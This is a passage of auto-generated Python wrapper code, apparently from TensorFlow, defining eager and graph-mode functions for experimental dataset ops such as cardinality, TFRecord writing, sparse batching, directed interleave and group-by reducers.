output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_datasets = _ops.convert_n_to_tensor(input_datasets, _dtypes.variant)
_inputs_flat = list(input_datasets)
_attrs = ("N", _attr_N, "num_experiments", num_experiments, "output_types",
output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalChooseFastestDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalChooseFastestDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_dataset_cardinality(input_dataset, name=None):
r"""Returns the cardinality of `input_dataset`.
Returns the cardinality of `input_dataset`.
Args:
input_dataset: A `Tensor` of type `variant`.
A variant tensor representing the dataset to return cardinality for.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `int64`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalDatasetCardinality", name,
_ctx._post_execution_callbacks, input_dataset)
return _result
except _core._FallbackException:
try:
return experimental_dataset_cardinality_eager_fallback(
input_dataset, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalDatasetCardinality", input_dataset=input_dataset,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"ExperimentalDatasetCardinality", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalDatasetCardinality(input_dataset, name=None):
return experimental_dataset_cardinality(input_dataset=input_dataset, name=name)
ExperimentalDatasetCardinality.__doc__ = experimental_dataset_cardinality.__doc__
ExperimentalDatasetCardinality = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalDatasetCardinality))
tf_export("raw_ops.ExperimentalDatasetCardinality")(ExperimentalDatasetCardinality)
def experimental_dataset_cardinality_eager_fallback(input_dataset, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_dataset_cardinality
"""
_ctx = ctx if ctx else _context.context()
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
_inputs_flat = [input_dataset]
_attrs = None
_result = _execute.execute(b"ExperimentalDatasetCardinality", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalDatasetCardinality", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_dataset_to_tf_record(input_dataset, filename, compression_type, name=None):
r"""Writes the given dataset to the given file using the TFRecord format.
Args:
input_dataset: A `Tensor` of type `variant`.
A variant tensor representing the dataset to write.
filename: A `Tensor` of type `string`.
A scalar string tensor representing the filename to use.
compression_type: A `Tensor` of type `string`.
A scalar string tensor containing either (i) the empty string (no
compression), (ii) "ZLIB", or (iii) "GZIP".
name: A name for the operation (optional).
Returns:
The created Operation.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalDatasetToTFRecord", name, _ctx._post_execution_callbacks,
input_dataset, filename, compression_type)
return _result
except _core._FallbackException:
try:
return experimental_dataset_to_tf_record_eager_fallback(
input_dataset, filename, compression_type, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalDatasetToTFRecord", input_dataset=input_dataset,
filename=filename,
compression_type=compression_type,
name=name)
return _op
_result = None
return _result
def ExperimentalDatasetToTFRecord(input_dataset, filename, compression_type, name=None):
return experimental_dataset_to_tf_record(input_dataset=input_dataset, filename=filename, compression_type=compression_type, name=name)
ExperimentalDatasetToTFRecord.__doc__ = experimental_dataset_to_tf_record.__doc__
ExperimentalDatasetToTFRecord = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalDatasetToTFRecord))
tf_export("raw_ops.ExperimentalDatasetToTFRecord")(ExperimentalDatasetToTFRecord)
def experimental_dataset_to_tf_record_eager_fallback(input_dataset, filename, compression_type, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_dataset_to_tf_record
"""
_ctx = ctx if ctx else _context.context()
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
filename = _ops.convert_to_tensor(filename, _dtypes.string)
compression_type = _ops.convert_to_tensor(compression_type, _dtypes.string)
_inputs_flat = [input_dataset, filename, compression_type]
_attrs = None
_result = _execute.execute(b"ExperimentalDatasetToTFRecord", 0,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_result = None
return _result
def experimental_dense_to_sparse_batch_dataset(input_dataset, batch_size, row_shape, output_types, output_shapes, name=None):
r"""Creates a dataset that batches input elements into a SparseTensor.
Args:
input_dataset: A `Tensor` of type `variant`.
A handle to an input dataset. Must have a single component.
batch_size: A `Tensor` of type `int64`.
A scalar representing the number of elements to accumulate in a
batch.
row_shape: A `Tensor` of type `int64`.
A vector representing the dense shape of each row in the produced
SparseTensor. The shape may be partially specified, using `-1` to indicate
that a particular dimension should use the maximum size of all batch elements.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalDenseToSparseBatchDataset", name,
_ctx._post_execution_callbacks, input_dataset, batch_size, row_shape,
"output_types", output_types, "output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_dense_to_sparse_batch_dataset_eager_fallback(
input_dataset, batch_size, row_shape, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_dense_to_sparse_batch_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_dense_to_sparse_batch_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalDenseToSparseBatchDataset", input_dataset=input_dataset,
batch_size=batch_size,
row_shape=row_shape,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalDenseToSparseBatchDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalDenseToSparseBatchDataset(input_dataset, batch_size, row_shape, output_types, output_shapes, name=None):
return experimental_dense_to_sparse_batch_dataset(input_dataset=input_dataset, batch_size=batch_size, row_shape=row_shape, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalDenseToSparseBatchDataset.__doc__ = experimental_dense_to_sparse_batch_dataset.__doc__
ExperimentalDenseToSparseBatchDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalDenseToSparseBatchDataset))
tf_export("raw_ops.ExperimentalDenseToSparseBatchDataset")(ExperimentalDenseToSparseBatchDataset)
def experimental_dense_to_sparse_batch_dataset_eager_fallback(input_dataset, batch_size, row_shape, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_dense_to_sparse_batch_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_dense_to_sparse_batch_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_dense_to_sparse_batch_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
batch_size = _ops.convert_to_tensor(batch_size, _dtypes.int64)
row_shape = _ops.convert_to_tensor(row_shape, _dtypes.int64)
_inputs_flat = [input_dataset, batch_size, row_shape]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalDenseToSparseBatchDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalDenseToSparseBatchDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_directed_interleave_dataset(selector_input_dataset, data_input_datasets, output_types, output_shapes, name=None):
r"""A substitute for `InterleaveDataset` on a fixed list of `N` datasets.
Args:
selector_input_dataset: A `Tensor` of type `variant`.
A dataset of scalar `DT_INT64` elements that determines which of the
`N` data inputs should produce the next output element.
data_input_datasets: A list of at least 1 `Tensor` objects with type `variant`.
`N` datasets with the same type that will be interleaved according to
the values of `selector_input_dataset`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalDirectedInterleaveDataset", name,
_ctx._post_execution_callbacks, selector_input_dataset,
data_input_datasets, "output_types", output_types, "output_shapes",
output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_directed_interleave_dataset_eager_fallback(
selector_input_dataset, data_input_datasets,
output_types=output_types, output_shapes=output_shapes, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(data_input_datasets, (list, tuple)):
raise TypeError(
"Expected list for 'data_input_datasets' argument to "
"'experimental_directed_interleave_dataset' Op, not %r." % data_input_datasets)
_attr_N = len(data_input_datasets)
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_directed_interleave_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_directed_interleave_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalDirectedInterleaveDataset", selector_input_dataset=selector_input_dataset,
data_input_datasets=data_input_datasets,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"), "N", _op.get_attr("N"))
_execute.record_gradient(
"ExperimentalDirectedInterleaveDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalDirectedInterleaveDataset(selector_input_dataset, data_input_datasets, output_types, output_shapes, name=None):
return experimental_directed_interleave_dataset(selector_input_dataset=selector_input_dataset, data_input_datasets=data_input_datasets, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalDirectedInterleaveDataset.__doc__ = experimental_directed_interleave_dataset.__doc__
ExperimentalDirectedInterleaveDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalDirectedInterleaveDataset))
tf_export("raw_ops.ExperimentalDirectedInterleaveDataset")(ExperimentalDirectedInterleaveDataset)
def experimental_directed_interleave_dataset_eager_fallback(selector_input_dataset, data_input_datasets, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_directed_interleave_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(data_input_datasets, (list, tuple)):
raise TypeError(
"Expected list for 'data_input_datasets' argument to "
"'experimental_directed_interleave_dataset' Op, not %r." % data_input_datasets)
_attr_N = len(data_input_datasets)
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_directed_interleave_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_directed_interleave_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
selector_input_dataset = _ops.convert_to_tensor(selector_input_dataset, _dtypes.variant)
data_input_datasets = _ops.convert_n_to_tensor(data_input_datasets, _dtypes.variant)
_inputs_flat = [selector_input_dataset] + list(data_input_datasets)
_attrs = ("output_types", output_types, "output_shapes", output_shapes, "N",
_attr_N)
_result = _execute.execute(b"ExperimentalDirectedInterleaveDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalDirectedInterleaveDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_group_by_reducer_dataset(input_dataset, key_func_other_arguments, init_func_other_arguments, reduce_func_other_arguments, finalize_func_other_arguments, key_func, init_func, reduce_func, finalize_func, output_types, output_shapes, name=None):
r"""Creates a dataset that computes a group-by on `input_dataset`.
Creates a dataset that computes a group-by on `input_dataset`.
Args:
input_dataset: A `Tensor` of type `variant`.
A variant tensor representing the input dataset.
key_func_other_arguments: A list of `Tensor` objects.
A list of tensors, typically values that were captured when
building a closure for `key_func`.
init_func_other_arguments: A list of `Tensor` objects.
A list of tensors, typically values that were captured when
building a closure for `init_func`.
reduce_func_other_arguments: A list of `Tensor` objects.
A list of tensors, typically values that were captured when
building a closure for `reduce_func`.
finalize_func_other_arguments: A list of `Tensor` objects.
A list of tensors, typically values that were captured when
building a closure for `finalize_func`.
key_func: A function decorated with @Defun.
A function mapping an element of `input_dataset`, concatenated
with `key_func_other_arguments` to a scalar value of type DT_INT64.
init_func: A function decorated with @Defun.
A function mapping a key of type DT_INT64, concatenated with
`init_func_other_arguments` to the initial reducer state.
reduce_func: A function decorated with @Defun.
A function mapping the current reducer state and an element of `input_dataset`,
concatenated with `reduce_func_other_arguments` to a new reducer state.
finalize_func: A function decorated with @Defun.
A function mapping the final reducer state to an output element.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalGroupByReducerDataset", name,
_ctx._post_execution_callbacks, input_dataset,
key_func_other_arguments, init_func_other_arguments,
reduce_func_other_arguments, finalize_func_other_arguments,
"key_func", key_func, "init_func", init_func, "reduce_func",
reduce_func, "finalize_func", finalize_func, "output_types",
output_types, "output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_group_by_reducer_dataset_eager_fallback(
input_dataset, key_func_other_arguments,
init_func_other_arguments, reduce_func_other_arguments,
finalize_func_other_arguments, key_func=key_func,
init_func=init_func, reduce_func=reduce_func,
finalize_func=finalize_func, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_group_by_reducer_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_group_by_reducer_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalGroupByReducerDataset", input_dataset=input_dataset,
key_func_other_arguments=key_func_other_arguments,
init_func_other_arguments=init_func_other_arguments,
reduce_func_other_arguments=reduce_func_other_arguments,
finalize_func_other_arguments=finalize_func_other_arguments,
key_func=key_func,
init_func=init_func,
reduce_func=reduce_func,
finalize_func=finalize_func,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("key_func", _op.get_attr("key_func"), "init_func",
_op.get_attr("init_func"), "reduce_func",
_op.get_attr("reduce_func"), "finalize_func",
_op.get_attr("finalize_func"), "Tkey_func_other_arguments",
_op.get_attr("Tkey_func_other_arguments"),
"Tinit_func_other_arguments",
_op.get_attr("Tinit_func_other_arguments"),
"Treduce_func_other_arguments",
_op.get_attr("Treduce_func_other_arguments"),
"Tfinalize_func_other_arguments",
_op.get_attr("Tfinalize_func_other_arguments"), "output_types",
_op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalGroupByReducerDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalGroupByReducerDataset(input_dataset, key_func_other_arguments, init_func_other_arguments, reduce_func_other_arguments, finalize_func_other_arguments, key_func, init_func, reduce_func, finalize_func, output_types, output_shapes, name=None):
return experimental_group_by_reducer_dataset(input_dataset=input_dataset, key_func_other_arguments=key_func_other_arguments, init_func_other_arguments=init_func_other_arguments, reduce_func_other_arguments=reduce_func_other_arguments, finalize_func_other_arguments=finalize_func_other_arguments, key_func=key_func, init_func=init_func, reduce_func=reduce_func, finalize_func=finalize_func, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalGroupByReducerDataset.__doc__ = experimental_group_by_reducer_dataset.__doc__
ExperimentalGroupByReducerDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalGroupByReducerDataset))
tf_export("raw_ops.ExperimentalGroupByReducerDataset")(ExperimentalGroupByReducerDataset)
def experimental_group_by_reducer_dataset_eager_fallback(input_dataset, key_func_other_arguments, init_func_other_arguments, reduce_func_other_arguments, finalize_func_other_arguments, key_func, init_func, reduce_func, finalize_func, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_group_by_reducer_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_group_by_reducer_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_group_by_reducer_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_attr_Tkey_func_other_arguments, key_func_other_arguments = _execute.convert_to_mixed_eager_tensors(key_func_other_arguments, _ctx)
_attr_Tinit_func_other_arguments, init_func_other_arguments = _execute.convert_to_mixed_eager_tensors(init_func_other_arguments, _ctx)
_attr_Treduce_func_other_arguments, reduce_func_other_arguments = _execute.convert_to_mixed_eager_tensors(reduce_func_other_arguments, _ctx)
_attr_Tfinalize_func_other_arguments, finalize_func_other_arguments = _execute.convert_to_mixed_eager_tensors(finalize_func_other_arguments, _ctx)
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
_inputs_flat = [input_dataset] + list(key_func_other_arguments) + list(init_func_other_arguments) + list(reduce_func_other_arguments) + list(finalize_func_other_arguments)
_attrs = ("key_func", key_func, "init_func", init_func, "reduce_func",
reduce_func, "finalize_func", finalize_func, "Tkey_func_other_arguments",
_attr_Tkey_func_other_arguments, "Tinit_func_other_arguments",
_attr_Tinit_func_other_arguments, "Treduce_func_other_arguments",
_attr_Treduce_func_other_arguments, "Tfinalize_func_other_arguments",
_attr_Tfinalize_func_other_arguments, "output_types", output_types,
"output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalGroupByReducerDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalGroupByReducerDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_group_by_window_dataset(input_dataset, key_func_other_arguments, reduce_func_other_arguments, window_size_func_other_arguments, key_func, reduce_func, window_size_func, output_types, output_shapes, name=None):
r"""Creates a dataset that computes a windowed group-by on `input_dataset`.
// TODO(mrry): Support non-int64 keys.
Args:
input_dataset: A `Tensor` of type `variant`.
key_func_other_arguments: A list of `Tensor` objects.
reduce_func_other_arguments: A list of `Tensor` objects.
window_size_func_other_arguments: A list of `Tensor` objects.
key_func: A function decorated with @Defun.
A function mapping an element of `input_dataset`, concatenated
with `key_func_other_arguments` to a scalar value of type DT_INT64.
reduce_func: A function decorated with @Defun.
window_size_func: A function decorated with @Defun.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalGroupByWindowDataset", name,
_ctx._post_execution_callbacks, input_dataset,
key_func_other_arguments, reduce_func_other_arguments,
window_size_func_other_arguments, "key_func", key_func, "reduce_func",
reduce_func, "window_size_func", window_size_func, "output_types",
output_types, "output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_group_by_window_dataset_eager_fallback(
input_dataset, key_func_other_arguments,
reduce_func_other_arguments, window_size_func_other_arguments,
key_func=key_func, reduce_func=reduce_func,
window_size_func=window_size_func, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_group_by_window_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_group_by_window_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalGroupByWindowDataset", input_dataset=input_dataset,
key_func_other_arguments=key_func_other_arguments,
reduce_func_other_arguments=reduce_func_other_arguments,
window_size_func_other_arguments=window_size_func_other_arguments,
key_func=key_func,
reduce_func=reduce_func,
window_size_func=window_size_func,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("key_func", _op.get_attr("key_func"), "reduce_func",
_op.get_attr("reduce_func"), "window_size_func",
_op.get_attr("window_size_func"), "Tkey_func_other_arguments",
_op.get_attr("Tkey_func_other_arguments"),
"Treduce_func_other_arguments",
_op.get_attr("Treduce_func_other_arguments"),
"Twindow_size_func_other_arguments",
_op.get_attr("Twindow_size_func_other_arguments"), "output_types",
_op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalGroupByWindowDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalGroupByWindowDataset(input_dataset, key_func_other_arguments, reduce_func_other_arguments, window_size_func_other_arguments, key_func, reduce_func, window_size_func, output_types, output_shapes, name=None):
return experimental_group_by_window_dataset(input_dataset=input_dataset, key_func_other_arguments=key_func_other_arguments, reduce_func_other_arguments=reduce_func_other_arguments, window_size_func_other_arguments=window_size_func_other_arguments, key_func=key_func, reduce_func=reduce_func, window_size_func=window_size_func, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalGroupByWindowDataset.__doc__ = experimental_group_by_window_dataset.__doc__
ExperimentalGroupByWindowDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalGroupByWindowDataset))
tf_export("raw_ops.ExperimentalGroupByWindowDataset")(ExperimentalGroupByWindowDataset)
def experimental_group_by_window_dataset_eager_fallback(input_dataset, key_func_other_arguments, reduce_func_other_arguments, window_size_func_other_arguments, key_func, reduce_func, window_size_func, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_group_by_window_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_group_by_window_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_group_by_window_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_attr_Tkey_func_other_arguments, key_func_other_arguments = _execute.convert_to_mixed_eager_tensors(key_func_other_arguments, _ctx)
_attr_Treduce_func_other_arguments, reduce_func_other_arguments = _execute.convert_to_mixed_eager_tensors(reduce_func_other_arguments, _ctx)
_attr_Twindow_size_func_other_arguments, window_size_func_other_arguments = _execute.convert_to_mixed_eager_tensors(window_size_func_other_arguments, _ctx)
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
_inputs_flat = [input_dataset] + list(key_func_other_arguments) + list(reduce_func_other_arguments) + list(window_size_func_other_arguments)
_attrs = ("key_func", key_func, "reduce_func", reduce_func,
"window_size_func", window_size_func, "Tkey_func_other_arguments",
_attr_Tkey_func_other_arguments, "Treduce_func_other_arguments",
_attr_Treduce_func_other_arguments, "Twindow_size_func_other_arguments",
_attr_Twindow_size_func_other_arguments, "output_types", output_types,
"output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalGroupByWindowDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalGroupByWindowDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_identity_indexed_dataset(size, name=None):
r"""TODO: add doc.
Args:
size: A `Tensor` of type `uint64`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalIdentityIndexedDataset", name,
_ctx._post_execution_callbacks, size)
return _result
except _core._FallbackException:
try:
return experimental_identity_indexed_dataset_eager_fallback(
size, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalIdentityIndexedDataset", size=size, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"ExperimentalIdentityIndexedDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalIdentityIndexedDataset(size, name=None):
return experimental_identity_indexed_dataset(size=size, name=name)
ExperimentalIdentityIndexedDataset.__doc__ = experimental_identity_indexed_dataset.__doc__
ExperimentalIdentityIndexedDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalIdentityIndexedDataset))
tf_export("raw_ops.ExperimentalIdentityIndexedDataset")(ExperimentalIdentityIndexedDataset)
def experimental_identity_indexed_dataset_eager_fallback(size, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_identity_indexed_dataset
"""
_ctx = ctx if ctx else _context.context()
size = _ops.convert_to_tensor(size, _dtypes.uint64)
_inputs_flat = [size]
_attrs = None
_result = _execute.execute(b"ExperimentalIdentityIndexedDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalIdentityIndexedDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_ignore_errors_dataset(input_dataset, output_types, output_shapes, name=None):
r"""Creates a dataset that contains the elements of `input_dataset` ignoring errors.
Args:
input_dataset: A `Tensor` of type `variant`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
